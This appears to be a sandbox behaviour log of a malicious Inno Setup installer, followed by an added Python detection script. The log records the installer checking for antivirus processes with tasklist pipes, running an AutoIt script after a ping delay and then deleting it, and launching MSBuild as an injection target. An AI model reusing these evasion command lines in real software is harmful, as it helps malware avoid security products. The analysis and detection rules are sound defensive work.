      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpFile read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
      Source: Reminder.exeReversingLabs: Detection: 54%
      Source: C:\Users\user\Desktop\Reminder.exeFile read: C:\Users\user\Desktop\Reminder.exe
      Source: unknownProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe"
      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\coigned\Updater.exe "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv"
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\coigned\Updater.exe "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
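The process-creation lines above describe one chain. An Inno Setup installer (the is-*.tmp staging directory, the /SL5= switch and the _isetup\ helper files are Inno Setup's) re-runs itself with /VERYSILENT, then checks for running security products one name at a time with tasklist /FI "IMAGENAME eq <name>" | find /I "<name>" (the names belong to Quick Heal, Avast, AVG, Norton, Sophos and Webroot), which is why conhost.exe, tasklist.exe and find.exe each appear once per checked name. It then launches Updater.exe from %LOCALAPPDATA%\coigned with friendliwise.csv as its argument; that binary runs a cmd.exe chain that pauses on ping -n 5 127.0.0.1, re-invokes updater.exe on a .a3x file (AutoIt's compiled-script extension, so Updater.exe is an AutoIt interpreter and friendliwise.csv is its script regardless of the name) and deletes the script, and finally spawns MSBuild.exe with no project file, the process the report's suspended-mode and remote-thread signatures point to as the injection target. The added example below is not code from the report, the sample or Joe Sandbox: it encodes those three behaviours as rules over constructed process-creation records whose command lines are copied from the report, plus two benign controls, and treats ping -n N as roughly N-1 seconds of delay.

```python
"""Detection rules for the process chain in the report, run over constructed
process-creation records (parent image, child image, command line).
Added example: not code from the report, the sample, or Joe Sandbox."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str   # command line of the created process


# Security-product processes the installer enumerates (names taken from the report).
AV_PROCESS_NAMES = {
    "opssvc.exe", "avastui.exe", "avgui.exe",
    "nswscsvc.exe", "sophoshealth.exe", "wrsa.exe",
}
# Directories a standard user can write to; a build tool launched from here is suspect.
USER_WRITABLE = ("\\appdata\\local\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")

# tasklist /FI "IMAGENAME eq X" ... | find /I "X": presence check for one process name
TASKLIST_FIND = re.compile(
    r'tasklist\s+/FI\s+"IMAGENAME\s+eq\s+(?P<name>[^"]+)"[^|]*\|\s*find\s+/I\s+"(?P=name)"',
    re.IGNORECASE,
)
# ping -n N 127.0.0.1 >nul && <exe> <script>.a3x && del <script>.a3x: sleep, run, self-delete
PING_RUN_DELETE = re.compile(
    r"ping\s+-n\s+(?P<count>\d+)\s+127\.0\.0\.1\s*>\s*nul\s*&&\s*"
    r"(?P<exe>\S+)\s+(?P<script>\S+\.a3x)\s*&&\s*del\s+(?P=script)",
    re.IGNORECASE,
)


def ping_sleep_seconds(count: int) -> int:
    """ping -n N to loopback pauses ~1 s between echoes, so it blocks about N-1 seconds."""
    return max(count - 1, 0)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def detect(events):
    """Return (rule, detail) pairs for every event that matches one of the three rules."""
    hits = []
    for ev in events:
        m = TASKLIST_FIND.search(ev.cmdline)
        if m and m.group("name").lower() in AV_PROCESS_NAMES:
            hits.append(("security_software_discovery", m.group("name").lower()))
        m = PING_RUN_DELETE.search(ev.cmdline)
        if m:
            wait = ping_sleep_seconds(int(m.group("count")))
            hits.append(("ping_sleep_run_delete", f"{m.group('exe')} {m.group('script')} after ~{wait}s"))
        # MSBuild.exe with no project argument, started by a binary in a user-writable path
        if (basename(ev.image) == "msbuild.exe"
                and ev.cmdline.strip() in (ev.image, f'"{ev.image}"')
                and in_user_writable(ev.parent)):
            hits.append(("msbuild_spawned_without_project", ev.parent))
    return hits


INSTALLER = r"C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp"
UPDATER = r"C:\Users\user\AppData\Local\coigned\Updater.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

# Constructed records: the first four reproduce command lines from the report,
# the last two are benign controls (an interactive tasklist, a real dotnet build).
REPORT_EVENTS = [
    ProcEvent(INSTALLER, r"C:\Windows\System32\cmd.exe",
              r'"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"'),
    ProcEvent(INSTALLER, r"C:\Windows\System32\cmd.exe",
              r'"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"'),
    ProcEvent(UPDATER, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x'),
    ProcEvent(UPDATER, MSBUILD, MSBUILD),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\tasklist.exe",
              r'tasklist /FI "IMAGENAME eq notepad.exe"'),
    ProcEvent(r"C:\Program Files\dotnet\dotnet.exe", MSBUILD, f'"{MSBUILD}" build.proj'),
]

if __name__ == "__main__":
    for rule, detail in detect(REPORT_EVENTS):
        print(f"{rule}: {detail}")
```

Run as a script it prints four hits; the interactive tasklist without the find pipe and the dotnet-driven MSBuild with a project argument produce none. The security-software rule is deliberately tied to the exact pipe shape and to the product names, because tasklist /FI on its own is everyday administrative use.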
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: explorerframe.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: cryptsp.dll
